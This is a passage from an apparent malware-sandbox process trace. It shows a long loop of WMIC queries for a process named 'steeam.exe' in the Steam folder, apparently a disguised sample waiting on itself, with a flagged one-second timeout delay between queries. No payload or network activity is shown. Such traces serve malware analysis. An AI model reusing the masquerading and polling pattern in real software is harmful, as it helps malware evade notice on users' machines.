7⤵
PID:2976

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2788

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3220

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3584

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4448

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4124

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5044

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:64

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2240

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4356

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2224

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1944

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4336

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2136

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4476

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2644

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3560

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:32

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3452

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2788

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1824

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1516

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2200

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4148

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4308

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4416

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4600

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2584

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4636

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2632

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3372

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3760

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4540

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1208

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2788

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2312

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:600

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2144

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1996

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4224

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1156

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1520

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2456

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1588

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1396

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5016

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3760

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4196

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3852

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2792

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1536

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1512

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2520

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5036

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:8

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2620

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1076

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1520

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3536

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2456

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3604

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4976

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1396

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5016

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4688

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4360

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4908

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4196

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3860

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1104

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1128

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:364

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4732

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1376

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1076

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4608

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2948

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4476

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4260

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:376

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4628

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2976

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2660

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2804

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3616

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2016

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4672

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5108

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5084

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1956

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:212

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1376

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1876

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3972

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2224

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3428

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3812

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2456

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2508

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4472

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2516

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2180

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1740

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4900

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2280

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:352

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2956

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4308

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5084

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1376

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2132

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4256

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2276

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1076

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1588

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3176

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3560

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3100

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:324

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4536

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2984

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3228

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:556

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:240

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3896

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2792

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3840

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:428

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4600

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4148

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4368

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1596

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1876

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3904

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2912

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:784

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:700

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2096

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2312

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4864

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3324

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4448

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4308

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4764

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5104

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1280

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:424

C:\Windows\system32\timeout.exe
